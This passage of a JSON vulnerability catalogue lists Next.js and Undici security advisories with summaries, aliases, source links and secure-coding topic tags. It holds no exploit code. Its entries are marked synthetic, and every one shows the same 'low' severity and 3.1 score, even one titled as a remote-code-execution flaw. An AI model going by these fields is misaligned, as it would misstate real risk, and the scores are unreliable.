"https://vercel.com/changelog/cve-2025-49005"
],
"aliases": [
"CVE-2025-49005",
"GHSA-r2fc-ccr8-96c4"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-49826": {
"canonical_id": "nextjs--CVE-2025-49826",
"title": "Next.js vulnerability can lead to DoS via cache poisoning",
"summary": "### Summary\nA vulnerability affecting Next.js has been addressed. It impacted versions 15.0.4 through 15.1.8 and involved a cache poisoning bug leading to a Denial of Service (DoS) condition.\n\nUnder certain conditions, this issue may allow an HTTP 204 response to be cached for static pages, leading to the 204 response being served to all users attempting to access the page.\n\nMore details: [CVE-2025-49826](https://vercel.com/changelog/cve-2025-49826)\n\n## Credits\n- Allam Rachid [zhero;](https://zhero-web-sec.github.io/research-and-things/)\n- Allam Yasser (inzo)",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-07-03T21:14:48Z",
"updated_at": "2025-07-03T21:49:52Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-67rr-84xm-4c7r",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-49826",
"https://github.com/vercel/next.js/commit/16bfce64ef2157f2c1dfedcfdb7771bc63103fd2",
"https://github.com/vercel/next.js/commit/a15b974ed707d63ad4da5b74c1441f5b7b120e93",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v15.1.8",
"https://vercel.com/changelog/cve-2025-49826"
],
"aliases": [
"CVE-2025-49826",
"GHSA-67rr-84xm-4c7r"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-55173": {
"canonical_id": "nextjs--CVE-2025-55173",
"title": "Next.js Content Injection Vulnerability for Image Optimization",
"summary": "A vulnerability in **Next.js Image Optimization** has been fixed in **v15.4.5** and **v14.2.31**. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery.\n\nAll users relying on `images.domains` or `images.remotePatterns` are encouraged to upgrade and verify that external image sources are strictly validated.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-55173)",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-08-29T21:59:55Z",
"updated_at": "2026-02-04T04:35:34.538107Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-xv57-4mr9-wg8v",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-55173",
"https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-55173",
"http://vercel.com/changelog/cve-2025-55173"
],
"aliases": [
"CVE-2025-55173",
"GHSA-xv57-4mr9-wg8v"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-57752": {
"canonical_id": "nextjs--CVE-2025-57752",
"title": "Next.js Affected by Cache Key Confusion for Image Optimization API Routes",
"summary": "A vulnerability in Next.js Image Optimization has been fixed in v15.4.5 and v14.2.31. When images returned from API routes vary based on request headers (such as `Cookie` or `Authorization`), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug.\n\nAll users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-57752)",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-08-29T22:06:22Z",
"updated_at": "2026-02-04T02:50:08.291668Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-g5qg-72qw-gw5v",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-57752",
"https://github.com/vercel/next.js/pull/82114",
"https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-57752"
],
"aliases": [
"CVE-2025-57752",
"GHSA-g5qg-72qw-gw5v"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-57822": {
"canonical_id": "nextjs--CVE-2025-57822",
"title": "Next.js Improper Middleware Redirect Handling Leads to SSRF",
"summary": "A vulnerability in **Next.js Middleware** has been fixed in **v14.2.32** and **v15.4.7**. The issue occurred when request headers were directly passed into `NextResponse.next()`. In self-hosted applications, this could allow Server-Side Request Forgery (SSRF) if certain sensitive headers from the incoming request were reflected back into the response.\n\nAll users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the `next()` function.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-57822)",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-08-29T21:33:09Z",
"updated_at": "2026-02-04T04:20:45.658010Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-57822",
"https://github.com/vercel/next.js/commit/9c9aaed5bb9338ef31b0517ccf0ab4414f2093d8",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-57822"
],
"aliases": [
"CVE-2025-57822",
"GHSA-4342-x723-ch2f"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"ssrf-url-validation"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-59471": {
"canonical_id": "nextjs--CVE-2025-59471",
"title": "Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration",
"summary": "A DoS vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.\n\nStrongly consider upgrading to 15.5.10 and 16.1.5 to reduce risk and prevent availability issues in Next applications.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-01-27T19:18:25Z",
"updated_at": "2026-02-10T01:28:46.973023Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-59471",
"https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c",
"https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v15.5.10",
"https://github.com/vercel/next.js/releases/tag/v16.1.5"
],
"aliases": [
"CVE-2025-59471",
"GHSA-9g9p-9gw9-jx7f"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-59472": {
"canonical_id": "nextjs--CVE-2025-59472",
"title": "Next.js has Unbounded Memory Consumption via PPR Resume Endpoint ",
"summary": "A denial of service vulnerability exists in Next.js versions with Partial Prerendering (PPR) enabled when running in minimal mode. The PPR resume endpoint accepts unauthenticated POST requests with the `Next-Resume: 1` header and processes attacker-controlled postponed state data. Two closely related vulnerabilities allow an attacker to crash the server process through memory exhaustion:\n\n1. **Unbounded request body buffering**: The server buffers the entire POST request body into memory using `Buffer.concat()` without enforcing any size limit, allowing arbitrarily large payloads to exhaust available memory.\n\n2. **Unbounded decompression (zipbomb)**: The resume data cache is decompressed using `inflateSync()` without limiting the decompressed output size. A small compressed payload can expand to hundreds of megabytes or gigabytes, causing memory exhaustion.\n\nBoth attack vectors result in a fatal V8 out-of-memory error (`FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory`) causing the Node.js process to terminate. The zipbomb variant is particularly dangerous as it can bypass reverse proxy request size limits while still causing large memory allocation on the server.\n\nTo be affected, an application must run with `experimental.ppr: true` or `cacheComponents: true` configured along with the NEXT_PRIVATE_MINIMAL_MODE=1 environment variable.\n\nStrongly consider upgrading to 15.6.0-canary.61 or 16.1.5 to reduce risk and prevent availability issues in Next applications.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-01-28T15:20:55Z",
"updated_at": "2026-02-06T13:13:43.709252Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-5f7q-jpqc-wp7h",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-59472",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/summaries-of-cve-2025-59471-and-cve-2025-59472"
],
"aliases": [
"CVE-2025-59472",
"GHSA-5f7q-jpqc-wp7h"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--GHSA-5j59-xgg2-r9c4": {
"canonical_id": "nextjs--GHSA-5j59-xgg2-r9c4",
"title": "Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up",
"summary": "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956) in React Server Components was incomplete and did not fully mitigate denial-of-service conditions across all payload types. As a result, certain crafted inputs could still trigger excessive resource consumption. \n\nThis vulnerability affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\nA malicious actor can send a specially crafted HTTP request to a Server Function endpoint that, when deserialized, causes the React Server Components runtime to enter an infinite loop. This can lead to sustained CPU consumption and cause the affected server process to become unresponsive, resulting in a denial-of-service condition in unpatched environments.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-12-12T17:21:57Z",
"updated_at": "2026-02-04T02:46:38.768104Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-5j59-xgg2-r9c4",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-67779",
"https://github.com/vercel/next.js",
"https://nextjs.org/blog/security-update-2025-12-11",
"https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components",
"https://www.cve.org/CVERecord?id=CVE-2025-55184",
"https://www.facebook.com/security/advisories/cve-2025-67779"
],
"aliases": [
"GHSA-5j59-xgg2-r9c4"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--GHSA-9qr9-h5gf-34mp": {
"canonical_id": "nextjs--GHSA-9qr9-h5gf-34mp",
"title": "Next.js is vulnerable to RCE in React flight protocol",
"summary": "A vulnerability affects certain React packages<sup>1</sup> for versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55182](https://www.cve.org/CVERecord?id=CVE-2025-55182). \n\nFixed in:\nReact: 19.0.1, 19.1.2, 19.2.1\nNext.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7, 15.6.0-canary.58, 16.1.0-canary.12+\n\nThe vulnerability also affects experimental canary releases starting with 14.3.0-canary.77. Users on any of the 14.3 canary builds should either downgrade to a 14.x stable release or 14.3.0-canary.76.\n\nAll users of stable 15.x or 16.x Next.js versions should upgrade to a patched, stable version immediately.\n\n<sup>1</sup> The affected React packages are:\n- react-server-dom-parcel\n- react-server-dom-turbopack\n- react-server-dom-webpack",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-12-03T19:07:11Z",
"updated_at": "2026-02-04T03:45:15.823345Z",
"official_source_url": "https://github.com/facebook/react/security/advisories/GHSA-fv66-9v8q-g76r",
"secondary_source_urls": [
"https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp",
"https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-fmh4-wr37-44fp",
"https://nvd.nist.gov/vuln/detail/CVE-2025-55182",
"https://github.com/vercel/next.js"
],
"aliases": [
"GHSA-9qr9-h5gf-34mp"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--GHSA-h25m-26qc-wcjf": {
"canonical_id": "nextjs--GHSA-h25m-26qc-wcjf",
"title": "Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components",
"summary": "A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-01-28T15:38:01Z",
"updated_at": "2026-02-13T00:43:52.836085Z",
"official_source_url": "https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg",
"secondary_source_urls": [
"https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf",
"https://nvd.nist.gov/vuln/detail/CVE-2026-23864",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/summary-of-cve-2026-23864"
],
"aliases": [
"GHSA-h25m-26qc-wcjf"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy",
"deserialization-safety"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--GHSA-mwv6-3258-q52c": {
"canonical_id": "nextjs--GHSA-mwv6-3258-q52c",
"title": "Next Vulnerable to Denial of Service with Server Components",
"summary": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that, when deserialized, can cause the server process to hang and consume CPU. This can result in denial of service in unpatched environments.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-12-11T22:49:27Z",
"updated_at": "2026-02-04T03:55:54.855562Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-mwv6-3258-q52c",
"secondary_source_urls": [
"https://github.com/vercel/next.js",
"https://nextjs.org/blog/security-update-2025-12-11",
"https://www.cve.org/CVERecord?id=CVE-2025-55184"
],
"aliases": [
"GHSA-mwv6-3258-q52c"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--GHSA-w37m-7fhw-fmv9": {
"canonical_id": "nextjs--GHSA-w37m-7fhw-fmv9",
"title": "Next Server Actions Source Code Exposure ",
"summary": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55183](https://www.cve.org/CVERecord?id=CVE-2025-55183).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that can return the compiled source code of [Server Functions](https://react.dev/reference/rsc/server-functions). This could reveal business logic, but would not expose secrets unless they were hardcoded directly into [Server Function](https://react.dev/reference/rsc/server-functions) code.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-12-11T22:49:56Z",
"updated_at": "2026-02-04T02:51:40.627151Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-w37m-7fhw-fmv9",
"secondary_source_urls": [
"https://github.com/vercel/next.js",
"https://nextjs.org/blog/security-update-2025-12-11",
"https://www.cve.org/CVERecord?id=CVE-2025-55183"
],
"aliases": [
"GHSA-w37m-7fhw-fmv9"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2022-31151": {
"canonical_id": "undici--CVE-2022-31151",
"title": "undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect",
"summary": "### Impact\n\nAuthorization headers are already cleared on cross-origin redirect in\nhttps://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189, based on https://github.com/nodejs/undici/issues/872.\n\nHowever, cookie headers which are sensitive headers and are official headers found in the spec, remain uncleared. There also has been active discussion of implementing a cookie store https://github.com/nodejs/undici/pull/1441, which suggests that there are active users using cookie headers in undici.\nAs such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site.\n\n### Patches\n\nThis was patched in v5.8.0.\n\n### Workarounds\n\nBy default, this vulnerability is not exploitable.\nDo not enable redirections, i.e. `maxRedirections: 0` (the default). \n\n### References\n\nhttps://hackerone.com/reports/1635514\nhttps://curl.se/docs/CVE-2018-1000007.html\nhttps://curl.se/docs/CVE-2022-27776.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n* To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document\n",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2022-07-21T20:31:05Z",
"updated_at": "2026-02-04T03:02:08.652391Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-31151",
"https://github.com/nodejs/undici/issues/872",
"https://github.com/nodejs/undici/pull/1441",
"https://github.com/nodejs/undici/commit/0a5bee9465e627be36bac88edf7d9bbc9626126d",
"https://hackerone.com/reports/1635514",
"https://github.com/nodejs/undici",
"https://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189",
"https://github.com/nodejs/undici/releases/tag/v5.8.0",
"https://security.netapp.com/advisory/ntap-20220909-0006"
],
"aliases": [
"CVE-2022-31151",
"GHSA-q768-x9m6-m9qp"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2022-32210": {
"canonical_id": "undici--CVE-2022-32210",
"title": "ProxyAgent vulnerable to MITM",
"summary": "### Description\n\n`Undici.ProxyAgent` never verifies the remote server's certificate, and always exposes all request & response data to the proxy. This unexpectedly means that proxies can MitM all HTTPS traffic, and if the proxy's URL is HTTP then it also means that nominally HTTPS requests are actually sent via plain-text HTTP between Undici and the proxy server.\n\n### Impact\n\nThis affects all use of HTTPS via HTTP proxy using **`Undici.ProxyAgent`** with Undici or Node's global `fetch`. In this case, it removes all HTTPS security from all requests sent using Undici's `ProxyAgent`, allowing trivial MitM attacks by anybody on the network path between the client and the target server (local network users, your ISP, the proxy, the target server's ISP, etc).\nThis less seriously affects HTTPS via HTTPS proxies. When you send HTTPS via a proxy to a remote server, the proxy can freely view or modify all HTTPS traffic unexpectedly (but only the proxy). \n\n### Patches\n\nThis issue was patched in Undici v5.5.1.\n\n### Workarounds\n\nAt the time of writing, the only workaround is to not use `ProxyAgent` as a dispatcher for TLS Connections.",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2022-06-17T01:02:29Z",
"updated_at": "2026-03-13T22:15:23.541247Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-pgw7-wx7w-2w33",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-32210",
"https://hackerone.com/reports/1583680",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2022-32210",
"GHSA-pgw7-wx7w-2w33"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2023-45143": {
"canonical_id": "undici--CVE-2023-45143",
"title": "Undici's cookie header not cleared on cross-origin redirect in fetch",
"summary": "### Impact\n\nUndici clears Authorization headers on cross-origin redirects, but does not clear `Cookie` headers. By design, `cookie` headers are [forbidden request headers](https://fetch.spec.whatwg.org/#forbidden-request-header), disallowing them to be set in `RequestInit.headers` in browser environments. Since Undici handles headers more liberally than the specification, there was a disconnect from the assumptions the spec made, and Undici's implementation of fetch.\n\nAs such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site.\n\n### Patches\n\nThis was patched in [e041de359221ebeae04c469e8aff4145764e6d76](https://github.com/nodejs/undici/commit/e041de359221ebeae04c469e8aff4145764e6d76), which is included in version 5.26.2.\n",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2023-10-16T14:05:37Z",
"updated_at": "2026-02-04T02:35:56.289390Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp",
"secondary_source_urls": [
"https://github.com/nodejs/undici/security/advisories/GHSA-wqq4-5wpv-mx2g",
"https://nvd.nist.gov/vuln/detail/CVE-2023-45143",
"https://github.com/nodejs/undici/commit/e041de359221ebeae04c469e8aff4145764e6d76",
"https://hackerone.com/reports/2166948",
"https://github.com/nodejs/undici",
"https://github.com/nodejs/undici/releases/tag/v5.26.2",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y"
],
"aliases": [
"CVE-2023-45143",
"GHSA-wqq4-5wpv-mx2g"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2024-30260": {
"canonical_id": "undici--CVE-2024-30260",
"title": "Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline",
"summary": "### Impact\n\nUndici cleared Authorization and Proxy-Authorization headers for `fetch()`, but did not clear them for `undici.request()`.\n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75.\nFixes has been released in v5.28.4 and v6.11.1.\n\n### Workarounds\n\nuse `fetch()` or disable `maxRedirections`.\n\n### References\n\nLinzi Shang reported this.\n\n* https://hackerone.com/reports/2408074\n* https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-04-04T14:20:39Z",
"updated_at": "2025-11-04T19:44:28Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-m4v8-wqvr-p9f7",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-30260",
"https://github.com/nodejs/undici/commit/64e3402da4e032e68de46acb52800c9a06aaea3f",
"https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75",
"https://hackerone.com/reports/2408074",
"https://github.com/nodejs/undici",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E",
"https://security.netapp.com/advisory/ntap-20240905-0008"
],
"aliases": [
"CVE-2024-30260",
"GHSA-m4v8-wqvr-p9f7"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2024-30261": {
"canonical_id": "undici--CVE-2024-30261",
"title": "Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect",
"summary": "### Impact\n\nIf an attacker can alter the `integrity` option passed to `fetch()`, they can let `fetch()` accept requests as valid even if they have been tampered.\n\n### Patches\n\nFixed in https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3.\nFixes has been released in v5.28.4 and v6.11.1.\n\n\n### Workarounds\n\nEnsure that `integrity` cannot be tampered with.\n\n### References\n\nhttps://hackerone.com/reports/2377760",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-04-04T14:20:54Z",
"updated_at": "2025-11-04T19:44:42Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-9qxr-qj54-h672",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-30261",
"https://github.com/nodejs/undici/commit/2b39440bd9ded841c93dd72138f3b1763ae26055",
"https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3",
"https://hackerone.com/reports/2377760",
"https://github.com/nodejs/undici",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33",
